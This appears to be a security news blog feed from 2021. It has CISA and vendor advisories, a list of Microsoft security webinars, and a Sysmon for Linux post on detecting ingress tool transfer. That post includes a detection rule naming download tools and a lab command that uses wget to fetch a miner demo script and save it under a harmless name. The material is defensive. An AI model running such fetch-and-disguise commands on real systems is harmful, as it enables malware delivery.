BLOG

CISA and FBI Release Alert on Active Exploitation of CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus

 Original release date: December 2, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity Advisory identifying active exploitation of a vulnerability—CVE-2021-44077—in Zoho ManageEngine ServiceDesk Plus. CVE-2021-44077 is an unauthenticated remote code execution vulnerability that affects all ServiceDesk Plus versions up to, and including, version 11305. 

This vulnerability was addressed by the update released by Zoho on September 16, 2021 for ServiceDesk Plus versions 11306 and above. If left unpatched, successful exploitation of the vulnerability allows an attacker to upload executable files and place webshells that enable post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files. Zoho has set up a security response plan center that provides additional details, a downloadable tool that can be run on potentially affected systems, and a remediation guide.

CISA encourages organizations to review the joint Cybersecurity Advisory and apply the recommended mitigations immediately.


Fri, 03 Dec 2021 13:13:00 +0000

Actors targeting the IT services sector

 Microsoft has observed multiple Iranian threat actors targeting the IT services sector in attacks that aim to steal sign-in credentials belonging to downstream customer networks to enable further attacks.


Iranian targeting of IT sector on the rise - Microsoft Security Blog


Thu, 18 Nov 2021 17:28:00 +0000

Drupal Releases Security Updates

 Drupal has released security updates to address vulnerabilities that could affect versions 8.9, 9.1, and 9.2. An attacker could exploit these vulnerabilities to take control of an affected system.

CISA encourages users and administrators to review Drupal Security Advisory SA-CORE-2021-011 and apply the necessary updates.


Thu, 18 Nov 2021 17:25:00 +0000

Microsoft Recordings | Security Community Webinars

 

AZURE COMPUTE

2021

Feb 3

Confidential computing nodes on Azure Kubernetes Service

YouTube

Deck

AZURE NETWORK SECURITY

2021

 May 20

Using Attack Simulation to Assess Protection and Detection Capabilities of Azure WAF

 YouTube

 Deck

 May 11

Central DNS Management and Logging with Azure Firewall 

YouTube

 Deck

May 6

Exploring IDPS Capability in Azure Firewall Premium

YouTube

Deck

May 4

Using Azure WAF Policies to Protect Your Web Application at Different Association Levels

YouTube

Deck

Apr 27

Safeguards for a Successful Azure DDoS Protection Standard Deployment

YouTube

Deck

Apr 6

Content Inspection Using TLS Termination with Azure Firewall Premium

YouTube

Deck

2020

 Dec 10

Azure Network Security Advanced Architecture

YouTube 

 Deck

 Dec 8

Azure Network Security for SOCs 

YouTube

 Deck

Dec 3

Getting started with Azure Firewall Manager

YouTube

Deck

Dec 1

Manage application and network connectivity with Azure Firewall

YouTube

Deck

Nov 12

Boosting your Azure Web Application (WAF) deployment

YouTube

Deck

Nov 10

Getting started with Azure Distributed Denial of Service (DDoS) Protection

YouTube

Deck

Oct 27

Protecting your web apps with Azure Web Application Firewall (WAF)

YouTube

Deck

Oct 15

Introduction to Azure Network Security

YouTube

Deck

AZURE PURVIEW

2021

 Jul 29

Discover Multi Cloud Data in Purview

 YouTube

 Deck

 Jun 17

 Better Together: E2E Sensitivity Label Flow from M365 to Azure Purview to SQL to Power BI

 YouTube

Deck 

Jan 27

Introduction to Azure Purview

YouTube

Deck

MICROSOFT 365 DEFENDER

2021

 Oct 11

 l33tSpeak: Advanced Hunting in Microsoft 365 Defender

 YouTube

 Demo

 Sep 15

Webinar Series: Monthly Threat Insights

YouTube

Deck 

Aug 18

Webinar Series: Monthly Threat Insights

YouTube

Deck

Jul 29

Introduction to Microsoft Defender Application Guard for Office

YouTube

 Deck

Jul 21

Webinar series: Monthly Threat Insights

YouTube

Deck

Jul 12

The story behind eSentire MDR with Microsoft 365 Defender: How eSentire streamlined security for itself and its customers

YouTube

Deck

Jun 16

Webinar series: Monthly Threat Insights

YouTube

Deck

May 10

l33tSpeak: Advanced Hunting in Microsoft 365 Defender

YouTube

GitHub

May 3

Microsoft 365 Defender’s Unified Experience for XDR

YouTube

Deck

Feb 22

What Tracking an Attacker Email Infrastructure Tells Us About Persistent Cybercriminal Operations

YouTube

Deck

Jan 28

Protect, Detect, and Respond to Solorigate using Microsoft 365 Defender

YouTube

Deck

2020

Nov 17

l33tSpeak | Advanced hunting in Microsoft 365 Defender

YouTube

Demo

Aug 5

Advanced Hunting series - Episode 4: Let’s hunt! Applying KQL to incident tracking

YouTube

Demo

Jul 29

Advanced Hunting series - Episode 3: Summarizing, Pivoting, and Visualizing Data

YouTube

Demo

Jul 22

Advanced Hunting series - Tracking the Adversary Episode 2: Joins

YouTube

Demo

Jul 15

Advanced Hunting series - Tracking the Adversary Episode 1: KQL Fundamentals

YouTube

Demo

MICROSOFT DEFENDER FOR CLOUD

(formerly Azure Security Center)

2021

Nov 17

NextGen Multi Cloud CSPM in Microsoft Defender for Cloud

YouTube

Deck

Nov 16

Azure Security Ignite 2021 Updates

YouTube

Deck

Oct 27

Azure Defender for SQL

YouTube

Deck

Oct 26

Manage Your Security Risk and Compliance Requirements with Azure Security Center

YouTube

Deck

Oct 20

What’s New in the Last 6 Months

YouTube

Deck

Oct 5

Better Together: Azure Defender, Azure Sentinel, and M365 Defender

YouTube

Deck

Aug 26

Better Together | Azure Security Center and Microsoft Defender for Endpoint

YouTube

Deck

Jul 22 

 

Manejo de Postura de Seguridad de la Nube y Protección de Cargas de Trabajo (Cloud Security Posture Management and Workload Protection)

YouTube

 

Deck

 

May 13 

 

Azure Workbooks in Security Center

 YouTube

Deck

 Apr 29

 Demystifying Azure Defender Once for All

 YouTube

 Deck

 Apr 28

 

Automate(d) Security with Azure Security Center and Logic Apps

 YouTube

 Deck

Mar 9 

 

Azure Defender for Storage

 YouTube

 Deck

 Feb 23

 Best Practices for Improving Your Secure Score

 YouTube

 Deck

Jan 7 

Azure service layers protection 

 YouTube

 Deck

 2020

Dec 7

Investigating Azure Security Center alerts using Azure Sentinel

YouTube

Deck

Nov 30

Azure Defender for SQL Anywhere

YouTube

Deck

Nov 9

Ignite 2020 Announcements

YouTube

Deck

Nov 2

Enhance IoT Security & Visibility with Azure Defender and Azure Sentinel 

YouTube

Deck

Oct 28

Multi-Cloud support in Azure Security Center

YouTube

Deck

Oct 26

VM Protection

YouTube

Deck

Mar 11

Security Benchmark Policy

YouTube

Deck

Feb 20

Secure Score enhanced model

YouTube

Deck

 MICROSOFT DEFENDER FOR CLOUD APPS

(formerly Microsoft Cloud App Security)

 2021

 Aug 17

Protect your Slack Deployment using Microsoft Cloud App Security

YouTube

Deck

Jun 8

Protect Your Salesforce Environment Using MCAS

YouTube

Deck

May 25

Improve Your AWS Security Posture Using MCAS

YouTube

Deck

May 12

Protect Your Box Deployment Using MCAS

YouTube

Deck

May 11

How to Protect Your GitHub Environment Using MCAS

YouTube

Deck

 2020

Apr 15

Enabling Secure Remote Work

YouTube

Deck

MICROSOFT DEFENDER FOR ENDPOINT

2021

May 18

Stopping Cabanak+FIN7: Understanding the MITRE Engenuity ATT&CK Results

YouTube

Deck

2020

Sep 16

Get started with Microsoft Defender ATP: from zero to hero

YouTube

Deck

Jul 7

Deploy MDATP capabilities using a phased roadmap

YouTube

Deck

Apr 2

End-to-end security for your endpoints

YouTube

Deck

MICROSOFT DEFENDER FOR IDENTITY

2021

Oct 6

Microsoft Defender for Identity’s Latest Detection Capabilities

YouTube

Deck

Jun 22

MDI in the Microsoft 365 Security Center

YouTube

Deck

Jun 1

Detection Deep Dive with Defender for Identity’s Engineering Experts

YouTube

Deck

Mar 23

Proactive Identity Posture Management

YouTube

Deck

MICROSOFT DEFENDER FOR IoT

(formerly Azure Defender for IoT)

2021

Oct 19

Agent Based Solution for IoT Device

YouTube

Deck

Jan 20

Leveraging OT Behavioral Analytics and Zero Trust for OT Cyber Resilience

YouTube

Deck

2020

Sep 17

MITRE ATT&CK for ICS: CyberX Demo and Azure IoT/OT Security Deep Dive

YouTube

Deck

MICROSOFT SENTINEL

(formerly Azure Sentinel)

2021

Nov 16

Create Your Own Microsoft Sentinel Solutions

YouTube

Deck

Nov 15

Improving the Breadth and Coverage of Threat Hunting with ADX Support, More Entity Types, and Updated MITRE Integration

YouTube

Deck

Nov 10

Decrease Your SOC’s MTTR (Mean Time to Respond) by Integrating Microsoft Sentinel with Microsoft Teams

YouTube

Deck

Nov 9

SAP Mini-Series Part 2: Deep Dive - End-to-End Installation of SAP for Microsoft Sentinel

YouTube

Deck

Nov 8

Latest Innovations for Microsoft’s Cloud Native SIEM

YouTube

Deck

Oct 28

What’s New in Azure Sentinel Automation

YouTube

Deck

Oct 25

Explore the Power of Threat Intelligence in Azure Sentinel

YouTube

Deck

Oct 18

SAP Mini-Series Part 1: Introduction to Monitoring SAP with Azure Sentinel for Security Professionals

YouTube

Deck

Oct 11

Become a Notebooks Ninja – Getting Started with Jupyter Notebooks in Azure Sentinel

YouTube

Deck

Oct 6

Turbocharging ASIM: Making Sure Normalization Helps Performance

Rather Than Impacting It

YouTube

Deck*

Sep 29

Better Together | OT and IoT Attack Detection, Investigation and Response

YouTube

Deck

Sep 15

What's New in the Last 6 Months

YouTube

Deck

Sep 14

Learn About Customizable Anomalies and How to Use Them

YouTube

Deck

Aug 18

Fusion ML Detections with Scheduled Analytics Rules

YouTube

Deck

Aug 11

Deep Dive into Azure Sentinel Normalizing Parsers and Normalized Content

YouTube

Deck

Jul 28

The Information Model: Understanding Normalization in Azure Sentinel

YouTube

Deck

Jul 20

Streamlining your SOC Workflow with Automated Notebooks

YouTube

Deck

Jul 13

Customizing Azure Sentinel with Python - MSTICPy and Jupyter Notebooks

YouTube

Deck

Jun 29

Threat Intelligence in Action with Anomali

YouTube

Deck

Jun 24

Cost Management in Azure Sentinel - Getting the Most for Your Investment

YouTube

Deck

May 26

Deep Dive into Azure Sentinel Innovations for RSA 2021

YouTube

Deck

Mar 31

Using Azure Data Explorer as Your Long Term Retention Platform of Azure Sentinel Logs

YouTube

Deck

Mar 18

Data Collection Scenarios

YouTube

Deck

Feb 18

Best Practices for Converting Detection Rules from Splunk, QRadar, and ArcSight to Azure Sentinel Rules

YouTube

Deck

Feb 4

Accelerate Your Azure Sentinel Deployment with the All-in-One Accelerator

YouTube 

Deck

Jan 21

Auditing and monitoring your Azure Sentinel workspace

YouTube

Deck

Jan 19

Azure Notebooks Fundamentals – How to get started

YouTube

Deck

Jan 12

Machine Learning detections in the AI-infused Azure Sentinel SIEM

YouTube

Deck

2020

 Sep 30

Unleash your Azure Sentinel automation Jedi tricks and build Logic Apps Playbooks like a Boss

YouTube

Deck

 Sep 29

Enabling User and Entity Behavior Analytics (UEBA) | Hunting for Insider Threats

YouTube

Deck

 Sep 14

Empowering the Azure Sentinel Community with Pre-Recorded Datasets for research and training purposes

YouTube

Deck

 Sep 9

KQL part 3 of 3 - Optimizing Azure Sentinel KQL queries performance

YouTube

Deck

Sep 2

Log Forwarder deep dive | Filtering CEF and Syslog events

YouTube

Deck

Aug 19

Threat intelligence automation with RiskIQ

YouTube

Deck

Aug 12

Threat hunting and reduce dwell times with Azure Sentinel

YouTube

Deck

Jul 28

KQL part 2 of 3: KQL hands-on lab exercises

YouTube

*Deck

Jul 9

Workbooks deep dive - Visualize your security threats and hunts

YouTube

Deck

Jun 23

Multi-tenant investigations

YouTube

Deck

Jun 15

Deploying and Managing Azure Sentinel as Code

YouTube

Deck

Jun 2

KQL part 1 of 3: Learn the KQL you need for Azure Sentinel

YouTube

*Deck

May 13

Using Sigma to accelerate your SIEM transformation to Azure Sentinel

YouTube

Deck

Apr 22

Threat Hunting on AWS using Sentinel

YouTube

Deck

Apr 20

MSSP and Distributed Organization Support

YouTube

Deck

Mar 31

Extending and Integrating Azure Sentinel (APIs)

YouTube

*Deck

Mar 18

Deep Dive on Threat Intelligence

YouTube

Deck

Mar 4

Recap of RSA 2020

YouTube

Deck

Feb 19

Tackling Identity

YouTube

*Deck

Feb 12

Deep Dive on Correlation Rules

YouTube

*Deck

Jan 29

Threat Hunting - revisited

YouTube

Deck

Jan 22

End-to-End SOC scenario

YouTube

Deck

MICROSOFT MISCELLANEOUS SECURITY WEBINARS

CYBERSECURITY FUNDAMENTALS

2021

Oct 21

Hacking AI with Counterfit

YouTube

Deck

Oct 14

Exploiting Vulnerabilities in Azure Stack Hub
(Note: All exploits discussed during the webinar have been addressed.)

YouTube

Deck

Oct 7

Combating Manipulated Media -Media Provenance

YouTube

Deck

Jul 1

Spa Treatments: Web Security in Single Page Applications

YouTube

Deck

Jun 15

Best Practices of Authentication & Authorization Methods

YouTube

Deck

Mar 24

Who Wants a Thousand Free Puppies? Managing Open Source Software Security in The Enterprise

YouTube

Deck

Feb 16

The Billion-Dollar Central Bank Heist

YouTube

Deck

2020

Dec 9

Microsoft Digital Defense Report

YouTube

Deck

Oct 29

Cybersecurity Basics: Securing Yourself

YouTube

Deck

DIVERSITY IN CYBERSECURITY 

2021

Oct 4

Mekonnen Kassa: From a Refugee to Microsoft: Impact of Active Allyship

YouTube

Deck

May 27

Sarah Young: How Unconventional Career Paths are Making a Difference in the Technology

YouTube

Deck

Mar 16

Sue Loh, software engineer at Microsoft and author of the young adult hacker novel Raven, inspires girls and other under-represented groups to enter tech. 

YouTube

Deck

 


Thu, 18 Nov 2021 15:17:00 +0000

MITRE ATT&CK technique coverage with Sysmon for Linux

 Thanks to Kevin Sheldrake, Roberto Rodriguez, Jessen Kurien and Ofer Shezaf for making this blog possible.

 

For many years, people have been using Sysmon on their Windows systems to gain clarity on what is happening on their machines and, for the security community, to highlight when suspicious or malicious activity occurs. Collecting events from individual hosts is crucial to ensuring you have the visibility needed to identify and respond to malicious events and Sysmon provides a way to do just that. With the introduction of Sysmon for Linux, that same clarity is available for many Linux distros.  While we won’t be detailing all the available Sysmon for Linux capabilities in this post, you can find the Sysmon documentation here, read about how to deploy Sysmon in conjunction with Azure Sentinel, look at a quick guide on how you can use Sysmon in conjunction with Azure Sentinel, or look through our GitHub repository where we’ve been experimenting with Sysmon configs for Linux.

 

To frame the conversation around how Sysmon for Linux (shortened to Sysmon from here on out) can be used to create clarity for security teams, we will walk through how Sysmon events can be used to spot a specific MITRE ATT&CK technique. The MITRE ATT&CK Matrix (Linux focused version here) is a well-known and respected framework that many organizations use to think about adversary techniques and assess detection coverage. Just like on the Windows side, Sysmon can be used to highlight tactics and techniques across the matrix. In this blog, we will focus in on the Ingress Tool Transfer technique (ID T1105) and highlight a couple of the Sysmon events that can be used to see it. We observe this technique being used against Linux systems and sensor networks regularly, and while we have tools to alert on this activity, it is still a good idea to ensure you have visibility into the host so you can investigate attacks. To look at this technique, we will show how to enable collection of three useful events, what those events look like when they fire, and how they can help you understand what happened. Additionally, we will show what those events look like in Azure Sentinel.

 

Ingress Tool Transfer (T1105)

It is common to see attackers taking advantage of initial access to a machine by downloading a script or piece of malware. While “living off the land” is still something to watch for, in attacks on our customers and against our sensor network we see attempts to download tools very frequently.  In fact, the MITRE ATT&CK page for Ingress Tool Transfer shows 290 different pieces of malware and activity groups that use this technique, so it is a good place to start showing how Sysmon can help add coverage to different ATT&CK techniques.

 

For this example, we will focus on the five most commonly used tools for downloading scripts and malware that we’ve seen run on our sensor networks. We will look for wget, curl, ftpget, tftp, and lwp-download. You may want to customize this list for your environment, but this will cover the majority of what we see.

 

Create your Sysmon configuration file

Just like Sysmon for Windows, you will want to create configuration files based on the system you are wanting to collect logs for based on the role of the system, your environment, and your collection requirements. The basics of how to write and run a configuration can be found on the Sysmon documentation page and you can see some examples in the MSTIC-Sysmon repo so we'll just focus on what we need for this specific technique. One thing to note is that the Event IDs are consistent between Windows and Linux so Event ID 1 represents process creation events in both environments.

 

We are interested in seeing when an attacker tries to download files to our computer. There are a few ways we can see that behavior reflected. To begin, we know that a process will have to get created to start the download. We also know that a network connection will have to be made and, if the attacker is successful, a file will be written. Lucky for us, Sysmon has us covered for all three of these with ProcessCreate, NetworkConnect, and FileCreate events.

 

Below is a basic configuration that we can use to create those events based on our list of the commonly used tools (it is available in our repo here). You can see we have separate sections for each of the events we want and have said we want to include the listed matches.  The tool name will be in the “Image” field, and we’ve used “end with” because we generally expect to see file paths there (ex. /bin/wget).

 

<!-- Created: 10/15/2021 Modified: 10/17/2021 Technique: Ingress Tool Transfer References: - https://attack.mitre.org/techniques/T1105/--> <Sysmon schemaversion="4.81"> <EventFiltering> <RuleGroup name="" groupRelation="or"> <ProcessCreate onmatch="include"> <Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or"> <Image condition="end with">wget</Image> <Image condition="end with">curl</Image> <Image condition="end with">ftpget</Image> <Image condition="end with">tftp</Image> <Image condition="end with">lwp-download</Image> </Rule> </ProcessCreate> </RuleGroup> <RuleGroup name="" groupRelation="or"> <NetworkConnect onmatch="include"> <Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or"> <Image condition="end with">wget</Image> <Image condition="end with">curl</Image> <Image condition="end with">ftpget</Image> <Image condition="end with">tftp</Image> <Image condition="end with">lwp-download</Image> </Rule> </NetworkConnect> </RuleGroup> <RuleGroup name="" groupRelation="or"> <FileCreate onmatch="include"> <Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or"> <Image condition="end with">wget</Image> <Image condition="end with">curl</Image> <Image condition="end with">ftpget</Image> <Image condition="end with">tftp</Image> <Image condition="end with">lwp-download</Image> </Rule> </FileCreate> </RuleGroup> </EventFiltering> </Sysmon>

 

One thing to note is that both ProcessCreate and ProcessTerminate are enabled by default.  If you don't want to collect one of those, you'll need an empty "include" statement. Once you have your configuration created and enabled, you’ll start seeing events.

 

Raw Sysmon events

The Sysmon logs can be found in /var/log/syslog. While you could just look at the raw events there, we have the SysmonLogView tool which can make it easier. This tool will take the Sysmon events and display them in the more human readable format that you can see below. You can use the below command to push new events from syslog into the sysmonLogView using the following command:

 

sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView

 

This gives us a running view of what events are being created. We can then run the below command to trigger the rules.


wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh


This command will use wget to call out to a server at 10.0.5.8 port 7000, download the xmrigAttackDemo.sh script, and save it as the script Harmless.sh. xmrigAttackDemo.sh is an internal testing script that I used for this demo.

 

ProcessCreate (Event ID 1):

You can see we get quite a lot of information from the ProcessCreate event. We can see wget in the Image field, the full Command Line, the Current Directory, and the user. You also get Parent Process information although it isn’t as interesting in this example.

 

Event SYSMONEVENT_CREATE_PROCESS RuleName: - UtcTime: 2021-09-28 21:53:22.533 ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000} ProcessId: 13409 Image: /usr/bin/wget FileVersion: - Description: - Product: - Company: - OriginalFileName: - CommandLine: wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh CurrentDirectory: /home/testUser User: testUser LogonGuid: {23b1b3a6-0000-0000-e903-000000000000} LogonId: 1001 TerminalSessionId: 38 IntegrityLevel: no level Hashes: - ParentProcessGuid: {23b1b3a6-8ed2-6153-0824-7cafd1550000} ParentProcessId: 13408 ParentImage: /bin/bash ParentCommandLine: bash

 

NetworkConnect (Event ID 3):

In the NetworkConnect event, we again see wget in the Image field and the user. We also see the protocol, source and destination IP addresses, and the ports involved. Our example command line has the IP listed already so it isn’t new information, but it could be useful in tying the different logs together. You’ll notice the Process IDs also match up as expected.

 

Event SYSMONEVENT_NETWORK_CONNECT RuleName: - UtcTime: 2021-09-28 21:53:22.543 ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000} ProcessId: 13409 Image: /usr/bin/wget User: testUser Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 10.0.5.10 SourceHostname: - SourcePort: 40680 SourcePortName: - DestinationIsIpv6: false DestinationIp: 10.0.5.8 DestinationHostname: - DestinationPort: 7000 DestinationPortName: -

 

FileCreate (Event ID 11):

Here we can again see the wget tool and the process Id. We also have the name of the file that was created and its file path.

 

Event SYSMONEVENT_FILE_CREATE RuleName: - UtcTime: 2021-09-28 21:53:22.536 ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000} ProcessId: 13409 Image: /usr/bin/wget TargetFilename: /home/testUser/Harmless.sh CreationUtcTime: 2021-09-28 21:53:22.536

 

Viewing in Azure Sentinel

Sysmon events are pushed to Syslog so if you are collecting Syslog events from your Linux machine into Azure Sentinel, you will get the Sysmon events.  For more details on how to make that connection, check out the documentation here.  Also, as the Sysmon events come through with most of the data in the Syslog Message field, you’ll need to parse out the fields you are interested in.  Fortunately, the Azure Sentinel Information Model parsers have you covered. You can install the Parsers from the link here. Once you do, you’ll have access to functions that have taken the guesswork out of parsing.

 

The parsing functions are available under Functions-> Workspace functions. In the below, you can see the Linux Sysmon functions we currently have.

russmc_7-1634581968271.png

 

Using the function vimProcessCreateLinuxSysmon, we can see our event reflected. We have narrowed the query to just the event in the example above and chosen to project only a couple of the columns of data.

russmc_0-1634586546027.png

From here you can start to include Sysmon as a data source for your hunting queries and analytics.

 

Sysmon for Linux and MITRE ATT&CK

While we didn’t dig into all the possible Sysmon events or ATT&CK techniques, hopefully you can see how you can use Sysmon to collect data that will highlight adversary techniques. Sysmon

is open source and available in the Sysinternals GitHub.  If you have requests or find bugs, check out the Sysmon for Linux project page for the best ways to contact the team. MSTIC has been working with different configs and have started a repo hereto share with the community. If you want to see other configs based on MITRE ATT&CK techniques, check them out here and feel free to add suggestions of your own. If you want a config that has all the techniques we've mapped so far, you can find it here. We will continue to come up with new ways to utilize the logs in Azure Sentinel and we look forward to seeing what the community develops. If the amazing work around the Windows version is any indication, we expect that the future of Linux logging is bright.

 

References:



Original  Post here


Thu, 18 Nov 2021 14:08:00 +0000

Security Advisory for BIND

 ISC Releases Security Advisory for BIND

10/28/2021 12:05 PM EDT

 

Original release date: October 28, 2021

The Internet Systems Consortium (ISC) has released a security advisory that addresses a vulnerability affecting multiple versions of the ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit this vulnerability to cause a denial-of-service condition.

CISA encourages users and administrators to review the ISC advisory for CVE-2021-25219 and apply the necessary updates or workaround.


Thu, 18 Nov 2021 14:05:00 +0000

Compromised a JavaScript NPM

 Hackers have compromised a JavaScript NPM library with password-stealing malware. The library, UAParser.js, garners 6 million downloads a week. The threat came after hackers hijacked UAParser.js's NPM account. GitHub has warned users that any device with the package installed should be considered compromised


Thu, 18 Nov 2021 14:01:00 +0000

Microsoft Information Protection (MIP) Ninja Training is Here

 We are very excited and pleased to announce this rendition of the Ninja Training Series. With all the other training out there, our team has been working diligently to get this content out there. There are several videos and resources out there and the overall purpose of the MIP Ninja training is to help you master this realm. We aim to get you up-to-date links to the community blogs, training videos, Interactive Guides, learning paths, and any other relevant documentation. 

 

To make it easier for you to start and advance your knowledge gradually without throwing you in deep waters, we split content in each offering into three levels: beginner, intermediate, and advanced.  

 

In addition, after each section, there will be a knowledge check based on the training material you’d have just finished! Since there’s a lot of content, the goal of these knowledge checks is to help you determine if you were able to get a few of the major key takeaways.  

 

There’ll be a fun certificate issued at the end of the training: Disclaimer: This is NOT an official Microsoft certification and only acts as a way of recognizing your participation in this training content. 

 

Lastly, this training will be updated on a quarterly basis to ensure you all have the latest and greatest material! 


Go here

 


Thu, 18 Nov 2021 13:59:00 +0000

Draft Baseline Criteria for Consumer Software Cybersecurity Labeling

 Please Submit Comments - Draft Baseline Criteria for Consumer Software Cybersecurity Labeling

Section 4sof the President’s Executive Order (EO) on “Improving the Nation’s Cybersecurity (14028),” issued on May 12, 2021, charges NIST, in coordination with the Federal Trade Commission (FTC) and other agencies, to initiate pilot programs for cybersecurity labeling. These labeling programs are intended to educate the public on the security capabilities of software development practices.

To inform this effort, Sec. 4 (u)of the EO directs NIST to “…identify secure software development practices or criteria for a consumer software labeling program.” Furthermore, the identified criteria “…shall reflect a baseline level of security practices, and if practicable, shall reflect increasingly comprehensive levels of testing and assessment that a product may have undergone.” Sec. 4 (u)also states that “...NIST shall examine all relevant information, labeling, and incentive programs, employ best practices, and identify, modify, or develop a recommended label or, if practicable, a tiered software security rating system. This review shall focus on ease of use for consumers and a determination of what measures can be taken to maximize participation.”

Today, NIST has released for public comment a document that advances these tasks: Draft Baseline Criteria for Consumer Software Cybersecurity Labeling. This draft document addresses the need to develop appropriate cybersecurity criteria for consumer software—and it informs the development and use of a label for consumer software which will improve consumers’ awareness, information, and ability to make purchasing decisions (while taking cybersecurity considerations into account). This document was developed after much input from a recent NIST workshop, position papers submitted to NIST, additional extensive research, and many discussions with experts and organizations from the public and private sectors.

We are seeking comments on all aspects of the criteria contained in the draft document (more details can be found in the ‘note to reviewers’ section of the draft document). In accordance with the EO, NIST plans to produce a final version of these criteria by February 6, 2022.

Please view the draft document HERE.

To submit comments, please email them to labeling-eo@nist.gov using the subject, "Draft Consumer Software Labeling Criteria," by December 16, 2021.


Thu, 18 Nov 2021 13:56:00 +0000

Azure Active Directory (AD) keyCredential property Information Disclosure

 Microsoft recently mitigated an information disclosure issue, CVE-2021-42306, to prevent private key data from being stored by some Azure services in the keyCredentials property of an Azure Active Directory (Azure AD) Application and/or Service Principal, and prevent reading of private key data previously stored in the keyCredentials property.

The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata.
The property is designed to accept a certificate with public key data for use in authentication, but certificates with private key data could have also been incorrectly stored in the property. Access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal.
Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data.
Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.
As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property.
As a precautionary measure, Microsoft is recommending customers using these services take action as described in “Affected products/services,” below. We are also recommending that customers who suspect private key data may have been added to credentials for additional Azure AD applications or Service Principals in their environments follow this guidance.

Affected products/services

Microsoft has identified the following platforms/services that stored their private keys in the public property. We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use.

Product/ServiceMicrosoft’s MitigationCustomer impact assessment and remediation
Azure Automation uses the Application and Service Principal keyCredential APIs when Automation Run-As Accounts are createdAzure Automation deployed an update to the service to prevent private key data in clear text from being uploaded to Azure AD applications. Run-As accounts created or renewed after 10/15/2021 are not impacted and do not require further action.Automation Run As accounts created with an Azure Automation self-signed certificate between 10/15/2020 and 10/15/2021 that have not been renewed are impacted. Separately customers who bring their own certificates could be affected. This is regardless of the renewal date of the certificate.
To identify and remediate impacted Azure AD applications associated with impacted Automation Run-As accounts, please navigate to this Github Repo
In addition, Azure Automation supports Managed Identities Support (GA announced on October 2021). Migrating to Managed Identities from Run-As will mitigate this issue. Please follow the guidance here to migrate.
Azure Migrate service creates Azure AD applications to enable Azure Migrate appliances to communicate with the service’s endpoints.Azure Migrate deployed an update to prevent private key data in clear text from being uploaded to Azure AD applications.
Azure Migrate appliances that were registered after 11/02/2021 and had Appliance configuration manager version 6.1.220.1 and above are not impacted and do not require further action
Azure Migrate appliances registered prior to 11/02/2021 and/or appliances registered after 11/02/2021 where auto-update was disabled could be affected by this issue.
To identify and remediate any impacted Azure AD applications associated with Azure Migrate appliances, please navigate to this link.
Azure Site Recovery (ASR) creates Azure AD applications to communicate with the ASR service endpoints.Azure Site Recovery deployed an update to prevent private keydata from being uploaded to Azure AD applications. Customers using Azure Site Recovery’s preview experience “VMware to Azure Disaster Recovery” after 11/01/2021 are not impacted and do not require further actionCustomers who have deployed and registered the preview version of VMware to Azure DR experience with ASR before 11/01/2021 could be affected.
To identify and remediate the impacted AAD Apps associated with Azure Site Recovery appliances, please navigate to this link.
Azure AD applications and Service Principals [1]Microsoft has blocked reading private key data as of 10/30/2021.Follow the guidance available at aad-app-credential-remediation-guide to assess if your application key credentials need to be rotated. The guidance walks through the assessment steps to identify if private key information was stored in keyCredentials and provides remediation options for credential rotation.

[1] This issue only affects Azure AD Applications and Service Principals where private key material in clear text was added to a keyCredential. Microsoft recommends taking precautionary steps to identify any additional instances of this issue in applications where you manage credentials and take remediation steps if impact is found.

What else can I do to audit and investigate applications for unexpected use?

Additionally, as a best practice, we recommend auditing and investigating applications for unexpected use:

Part of any robust security posture is working with researchers to help find vulnerabilities, so we can fix any findings before they are misused. We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe.


Thu, 18 Nov 2021 13:53:00 +0000